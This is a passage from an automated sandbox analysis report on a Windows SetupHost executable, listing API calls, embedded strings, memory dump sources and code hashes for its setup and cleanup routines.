                                                                                                                                                                                                                • API String ID: 1010553850-250048683
                                                                                                                                                                                                                • Opcode ID: 713d0e77461bd99c6f53009c337167be271cb86bf1f4f1e0955653e10b19881e
                                                                                                                                                                                                                • Instruction ID: a685638857f11f3ae2143ab29e5d8cb961b5230b99cbd3cde454adbe4d460f89
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 713d0e77461bd99c6f53009c337167be271cb86bf1f4f1e0955653e10b19881e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B210472B006B5ABD726D6ABC9087AEB6B9BF44721F114235E801E3351D738ED00CAD4
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _wcsnicmp
                                                                                                                                                                                                                • String ID: \??\$\\?\
                                                                                                                                                                                                                • API String ID: 1886669725-3789169603
                                                                                                                                                                                                                • Opcode ID: 3343b1ded47845b42f88aed8410b9ed4986be38fae63c4cf30e652a61e786396
                                                                                                                                                                                                                • Instruction ID: 8af2aa87436798a06ec5c4fe81636f32dd166928b1f7404fb6460f0381f20756
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3343b1ded47845b42f88aed8410b9ed4986be38fae63c4cf30e652a61e786396
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F511E632600241ABD722CBA79D95BE777ADEF90764F584028EE46C3691FB74DD11C3A0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WTSRegisterSessionNotification.WTSAPI32(?,00000000), ref: 009A7481
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009A748B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • CSystemHelper::SetUserSessionChangedCallback, xrefs: 009A74D0
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLastNotificationRegisterSession
                                                                                                                                                                                                                • String ID: CSystemHelper::SetUserSessionChangedCallback
                                                                                                                                                                                                                • API String ID: 206945193-1353532461
                                                                                                                                                                                                                • Opcode ID: 8f9110e59ebec19daf05448754fa23eeb4dd7f3fbfd038f9410aac8a18a5e006
                                                                                                                                                                                                                • Instruction ID: 485742b9d26b42d0c768f1d52f2d4c932751a5468ea3343aad529ed740b434b4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f9110e59ebec19daf05448754fa23eeb4dd7f3fbfd038f9410aac8a18a5e006
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C411A7317042005BDF189FBADC99E6EBBEEAFC9720714841AF905CB361DA74DC068790
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateMutexW.KERNEL32(00000000,00000000,Global\Microsoft.Windows.Setup.Cleanup), ref: 00A0CBE6
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A0CBEE
                                                                                                                                                                                                                • CoInitializeEx.OLE32(00000000,?), ref: 00A0CC07
                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 00A0CC2B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • Global\Microsoft.Windows.Setup.Cleanup, xrefs: 00A0CBDF
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateErrorInitializeLastMutexUninitialize
                                                                                                                                                                                                                • String ID: Global\Microsoft.Windows.Setup.Cleanup
                                                                                                                                                                                                                • API String ID: 3399235231-1105763726
                                                                                                                                                                                                                • Opcode ID: aadc05cd4f99f8e787ec07fb49e0e5b96df8e0d567502a8b010fa7185bdd307c
                                                                                                                                                                                                                • Instruction ID: 192c8718b9b9d23b391bd53e84db44aab6b7693cfd692ec5fc38fc7e8206803c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aadc05cd4f99f8e787ec07fb49e0e5b96df8e0d567502a8b010fa7185bdd307c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1F09C3160997657E7215B7AFD086AE76A4AB927B17194360F80ED31D0D724CC8342E4
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00A0882B
                                                                                                                                                                                                                  • Part of subcall function 00A08652: GetProcessHeap.KERNEL32(00000000,00000001,00A08BE3,?,009B8133,00000000), ref: 00A08661
                                                                                                                                                                                                                • wcscpy_s.MSVCRT ref: 00A088AD
                                                                                                                                                                                                                  • Part of subcall function 00A0A596: LoadLibraryExW.KERNEL32(ntdll.dll,00000000,00000800,?,?,?,?,00A088BB,?), ref: 00A0A5AB
                                                                                                                                                                                                                  • Part of subcall function 00A0A596: wcscpy_s.MSVCRT ref: 00A0A601
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: wcscpy_s$H_prolog3HeapLibraryLoadProcess
                                                                                                                                                                                                                • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\OneSettings$Setup360$WSD
                                                                                                                                                                                                                • API String ID: 876847848-1135432301
                                                                                                                                                                                                                • Opcode ID: e8dd0f70a2308eb1814315222f81f4fa979f8afe9e3ece1088573d8cad69c8f6
                                                                                                                                                                                                                • Instruction ID: 6824bddfca1637b4122b39dc10df840d8c75816996d7dc1c4dc931aff1c19c21
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8dd0f70a2308eb1814315222f81f4fa979f8afe9e3ece1088573d8cad69c8f6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F30192B1A01A16ABC208FF74EA626C8F764BF54700F00461AF555572C1DFB57625CBCA
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000000,00000000), ref: 009E2862
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,0C000100,00000000,00000000,00000000,?,?,?), ref: 009E2965
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,?,0C000100,00000000,00000000,00000000,?,?,?,?), ref: 009E29C3
                                                                                                                                                                                                                  • Part of subcall function 009E3A9E: __allrem.LIBCMT ref: 009E3B19
                                                                                                                                                                                                                  • Part of subcall function 009E3A9E: SetLastError.KERNEL32(000004D3,?,?,?,00000000,?,00A00000,00000000,00000000,00000000,0C000100,?,00000000,00000000,?,00000000), ref: 009E3B40
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009E2994
                                                                                                                                                                                                                • CloseHandle.KERNEL32(0C000100), ref: 009E29B8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$CloseHandle$CreateFile__allrem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1763196040-0
                                                                                                                                                                                                                • Opcode ID: 6db34fde99aaacc3460b1c7a0ee957d11d44a856c7388902b17079d478f98142
                                                                                                                                                                                                                • Instruction ID: 1bcdea0c41142e79c7f8d0819032b495ff7487ada69b8a2cd7cdba4362c655a2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6db34fde99aaacc3460b1c7a0ee957d11d44a856c7388902b17079d478f98142
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF619375A01249EBCF16CFAAC9809EEBBBDFF88760F145219F921A7291D7309D41CB50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 009C9B6E
                                                                                                                                                                                                                  • Part of subcall function 009DB3AC: DbgPrintEx.NTDLL ref: 009DB3F2
                                                                                                                                                                                                                  • Part of subcall function 009DB3AC: RtlRaiseStatus.NTDLL(C0000420), ref: 009DB400
                                                                                                                                                                                                                  • Part of subcall function 009C6B97: RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 009C6BAF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • MicrodomImplementation::CMicrodom::GetElementsByTagName, xrefs: 009C9C08
                                                                                                                                                                                                                • ::BUCL::Rtl::Add<SIZE_T>( cElements, 10, NewCapacity), xrefs: 009C9BF6
                                                                                                                                                                                                                • TempTempElements.Allocate(NewCapacity), xrefs: 009C9BE1
                                                                                                                                                                                                                • onecore\base\xml\udom_microdom.cpp, xrefs: 009C9C01
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeHeapPrintRaiseStatusmemcpy
                                                                                                                                                                                                                • String ID: ::BUCL::Rtl::Add<SIZE_T>( cElements, 10, NewCapacity)$MicrodomImplementation::CMicrodom::GetElementsByTagName$TempTempElements.Allocate(NewCapacity)$onecore\base\xml\udom_microdom.cpp
                                                                                                                                                                                                                • API String ID: 2514639472-2804875981
                                                                                                                                                                                                                • Opcode ID: 49ce851f55631ebb07ae6848533e75712317e360cf1997aa3a2b37a7675fb7ba
                                                                                                                                                                                                                • Instruction ID: 66aa95d0367f05f56bde2ee9f7f031eb3684691b47d38ccac7ae86cb651118b6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49ce851f55631ebb07ae6848533e75712317e360cf1997aa3a2b37a7675fb7ba
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF51F471D10219ABCF14CF99D885EEEBBF9AF48314F24805EE405B7251D774AE41CBA2
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009EB630
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009EB63E
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00000002,00000000,?,?,000000FF,00000000,00000000,00000001), ref: 009EB65A
                                                                                                                                                                                                                • memset.MSVCRT ref: 009EB675
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,?,00000007,00000000,?,?,00000000), ref: 009EB6AC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Error$Status$CreateFileLastmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3130652376-0
                                                                                                                                                                                                                • Opcode ID: 792c33089f1582a30b20e13685cf752a6b5e9555ca02fda95a784050335eff6c
                                                                                                                                                                                                                • Instruction ID: dcf21615e2bb00fed20395e7636704143beb074e15e5fa6c162f8eb46c58fea6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 792c33089f1582a30b20e13685cf752a6b5e9555ca02fda95a784050335eff6c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7041DC329005689BDB22CF66CD44BEF7BBAAB88320F144195F509E3250DB31DE918F54
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?), ref: 009E986E
                                                                                                                                                                                                                • HeapReAlloc.KERNEL32(00000000,?,?), ref: 009E9875
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: GetLastError.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB6D8
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: GetCurrentThreadId.KERNEL32(?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB6EC
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: RtlAcquireResourceShared.NTDLL ref: 009EB6FC
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: RtlReleaseResource.NTDLL(00A16750), ref: 009EB728
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: SetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB766
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB773
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: HeapFree.KERNEL32(00000000), ref: 009EB77A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$ErrorLastProcessResource$AcquireAllocCurrentFreeReleaseSharedThread
                                                                                                                                                                                                                • String ID: AllocateReadChunk
                                                                                                                                                                                                                • API String ID: 1072803225-3254503978
                                                                                                                                                                                                                • Opcode ID: 43e42b1c14eb74376bec470a0dc9a4e842be80097728daf90c2c6f0c35fe9444
                                                                                                                                                                                                                • Instruction ID: 6b7c7072e33ec6ea2d85f6b889127c645c79103d2bd883b4039b673232db1251
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43e42b1c14eb74376bec470a0dc9a4e842be80097728daf90c2c6f0c35fe9444
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A413674A00645DFCB25CF6AC48095ABBF5FF89314B20866DE84A9B361D731ED42CF90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 009B9900
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009B9907
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 009B9924
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009B992E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 009B995F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009B9966
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocByteCharErrorFreeLastMultiWide
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4078814206-0
                                                                                                                                                                                                                • Opcode ID: 2d48a782a8ebd2bd020ba5b803c54977df789ab090ff127b6027a87311c1c45b
                                                                                                                                                                                                                • Instruction ID: cb12c94500fbbcb598923f168466562d3a6e8c31f63491da3f5980dc5385e742
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d48a782a8ebd2bd020ba5b803c54977df789ab090ff127b6027a87311c1c45b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA310436A10209ABCB11EBA48A98BED777AAFC5370F258469F7059B240DE31CD028750
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057), ref: 009C0C5C
                                                                                                                                                                                                                  • Part of subcall function 009BE2CF: GetFileAttributesW.KERNEL32(00000000,?,00000000,00000000,009C076D,?,00000000,00000000,00000000,009DE497,?,00000000), ref: 009BE2F1
                                                                                                                                                                                                                  • Part of subcall function 009BE2CF: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 009BE321
                                                                                                                                                                                                                  • Part of subcall function 009BE2CF: HeapFree.KERNEL32(00000000,?,00000000), ref: 009BE328
                                                                                                                                                                                                                  • Part of subcall function 009BE2CF: SetLastError.KERNEL32(00000000,?,00000000), ref: 009BE32F
                                                                                                                                                                                                                • GetLastError.KERNEL32(Function_000409E0,?,00000000), ref: 009C0BFD
                                                                                                                                                                                                                • Sleep.KERNEL32(?,?,?,?,?,00000000), ref: 009C0C48
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • CopyDirectoryEx2: Specified directory [%s] doesn't exist, xrefs: 009C0B90
                                                                                                                                                                                                                • CopyDirectoryEx2: Failed to copy [%s] to [%s], GLE = 0x%x; will retry in %u ms; am on try %u., xrefs: 009C0C28
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Heap$AttributesFileFreeProcessSleep
                                                                                                                                                                                                                • String ID: CopyDirectoryEx2: Failed to copy [%s] to [%s], GLE = 0x%x; will retry in %u ms; am on try %u.$CopyDirectoryEx2: Specified directory [%s] doesn't exist
                                                                                                                                                                                                                • API String ID: 687222072-1191139637
                                                                                                                                                                                                                • Opcode ID: e8f662eccea031cc7daa9c89110bfcb68c731dcc51b2bffb05b14447f9233976
                                                                                                                                                                                                                • Instruction ID: 530bd3302c0cae5a58d91b47f834aa2ba1d16cf71ca893d3621ed9788c021280
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8f662eccea031cc7daa9c89110bfcb68c731dcc51b2bffb05b14447f9233976
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C231C334E80200EBDF30AB95C982FAAB7ADEFC8754F24881DF49693191DAB19D40D712
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(005250C0,00000018,0052AD90,00000000,?,0099C820,0099C820,?,00A01DE0,009FFBA3), ref: 00A01B62
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,0099C820,0099C820,?,00A01DE0,009FFBA3), ref: 00A01B69
                                                                                                                                                                                                                  • Part of subcall function 00A01F3F: memset.MSVCRT ref: 00A01F75
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000018,0052AD90,00000000,?,0099C820,0099C820,?,00A01DE0,009FFBA3), ref: 00A01BD4
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,0099C820,0099C820,?,00A01DE0,009FFBA3), ref: 00A01BDB
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000000,?,0099C820,0099C820,?,00A01DE0,009FFBA3), ref: 00A01C08
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,0099C820), ref: 00A01C0F
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Alloc$Freememset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2565529166-0
                                                                                                                                                                                                                • Opcode ID: 36d92583d762276edc798eb87df96f30785d5f817816ca73fd0cc48a79479e9a
                                                                                                                                                                                                                • Instruction ID: d40c18155f34b6efc623c277bb9db392d79fca31a31b3e9c63cf9ea3078a024b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36d92583d762276edc798eb87df96f30785d5f817816ca73fd0cc48a79479e9a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C231B1719407059FDB21CF64E844AABBBF5FF4A710B158959E806DB280EB70ED41CBA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • Sleep.KERNEL32(0000012C,00000000,00A16DD0,?,009E0E70,009E0E70,?,009E0EB4,00000000,00A16DCC,009E0F24,?,?,00000000,?,009E0B15), ref: 009E043E
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00A16DD0,?,009E0E70,009E0E70,?,009E0EB4,00000000,00A16DCC,009E0F24,?,?,00000000,?,009E0B15,?), ref: 009E046E
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,009E0E70,009E0E70,?,009E0EB4,00000000,00A16DCC,009E0F24,?,?,00000000,?,009E0B15,?,?,?), ref: 009E0484
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • onecore\base\ntsetup\opktools\osimage\lib\utility\sync.c, xrefs: 009E04AA
                                                                                                                                                                                                                • WimLazyInitialize, xrefs: 009E04AF
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Sleep
                                                                                                                                                                                                                • String ID: WimLazyInitialize$onecore\base\ntsetup\opktools\osimage\lib\utility\sync.c
                                                                                                                                                                                                                • API String ID: 1644506474-4064903587
                                                                                                                                                                                                                • Opcode ID: e4f7d427893971ecb0339b1195527a036214b79cb1d1c5d3905c71253d37705d
                                                                                                                                                                                                                • Instruction ID: cb6ec35dfb444e0ff63f08ec0c7cd0d049853d9a2bf691a486b9a88402a5f3e3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e4f7d427893971ecb0339b1195527a036214b79cb1d1c5d3905c71253d37705d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82210C36A002715BD723876B8E4476E76A8BFC0760F118125EE45DB3E0FAB4CC8187D0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
